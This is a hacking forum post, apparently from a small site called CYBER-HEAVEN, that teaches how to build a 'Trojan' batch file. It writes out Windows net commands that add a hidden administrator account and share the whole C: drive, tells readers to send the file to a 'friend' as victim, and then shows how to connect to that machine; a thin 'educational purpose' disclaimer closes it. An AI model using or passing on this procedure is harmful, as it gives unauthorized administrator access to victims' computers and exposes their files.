CYBER-HEAVEN
PLEASE REGESTER IF U LIKE OUR FORUM

THANX FOR VISITING


IF U WANT TO MODERATE THIS FORUM

REGESTER AND POST 3 NEW TOPICS IN ANY CATEGORY

U WILL BE MADE THE MODERATOR
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» GET BEST AUDIO QUALTIY FROM YOUR WINDOWS PC
Thu Oct 03, 2013 12:36 am by Admin

» Dish Network Channel Starz, aim my dish network dish
Thu May 16, 2013 10:02 am by latinnoc

» Dish Network Little Elm Tx & dish network via broadband
Wed May 15, 2013 3:37 pm by latinnoc

» Dish Network Moving Promotions
Wed May 15, 2013 3:06 pm by latinnoc

» Dish Network Twc Channel - what channel is fox 1 on dish network
Wed May 15, 2013 9:00 am by latinnoc

» 005 Error Dish Network
Wed May 15, 2013 8:43 am by latinnoc

» Weta Kids Dish Network
Tue May 14, 2013 3:21 pm by latinnoc

» Dish Network In Augusta Maine
Tue May 14, 2013 2:44 pm by latinnoc

» hack torrent for increase speed using trackers
Thu Apr 11, 2013 4:09 pm by Fauriza

Who is online?
In total there are 2 users online :: 0 Registered, 0 Hidden and 2 Guests

None

[ View the whole list ]


Most users ever online was 18 on Sun Apr 29, 2018 6:49 pm
Social bookmarking

Social bookmarking digg  Social bookmarking delicious  Social bookmarking reddit  Social bookmarking stumbleupon  Social bookmarking slashdot  Social bookmarking yahoo  Social bookmarking google  Social bookmarking blogmarks  Social bookmarking live      

Bookmark and share the address of CYBER-HEAVEN on your social bookmarking website

Top posting users this week

Like/Tweet/+1
BOOKMARK US

Create Trojans using .Bat files

Go down

Create Trojans using .Bat files

Post by Admin on Sun Oct 28, 2012 12:15 pm

What is a Trojan?
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user’s computer system.




Let us have a small tutorial on making Trojan which share ‘C’ drive and creates a new user with administrators access. We will use NET command in this process.

To know various commands involved with this NET command, Open Command Prompt-> Type cmd-> Press Enter and type Net, press Enter you will see something like this.



In this tutorial we will use net user, net send and net share:

Open a Notepad to type the commands you can also use command prompt to check whether the commands are working or not.
Command -> net user username /add
It makes a new user called username(you can keep any desired name in place of username).
Command -> net localgroup administrators username /add
It makes the user(username) to get added to the administrators group.
Command ->net share system=C: /unlimited
This commands share the C: drive with the name of system.
Now keep these three commands in a Notepad and save it as any-name with .Bat extension and you are done.


Send this bat file to your friend as soon as the bat file is opened victim’s C: drive will be shared and a new administrator user will be created. Now to access the victim’s system you need to make a session with the remote computer using net use command, you should execute these commands from your dos prompt.

Commands to make this happen:

Command -> net use \victimip neo
In the above command in the place of victim’s place, the IP address of your friend, this command creates a session between you and victim. Twisted Evil
Command -> explorer \victimipsystem Twisted Evil
This will open a explorer window in the share system which is nothing but C: drive with administrators access. Twisted Evil
Now you can access the victim’s computer. clown This article is only for educational purpose we are not encouraging anyone to do illegal activities. clown
avatar
Admin
Admin
Admin

Posts : 58
likes : 6
Join date : 2012-10-26

View user profile http://cyber-heaven.forumotion.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum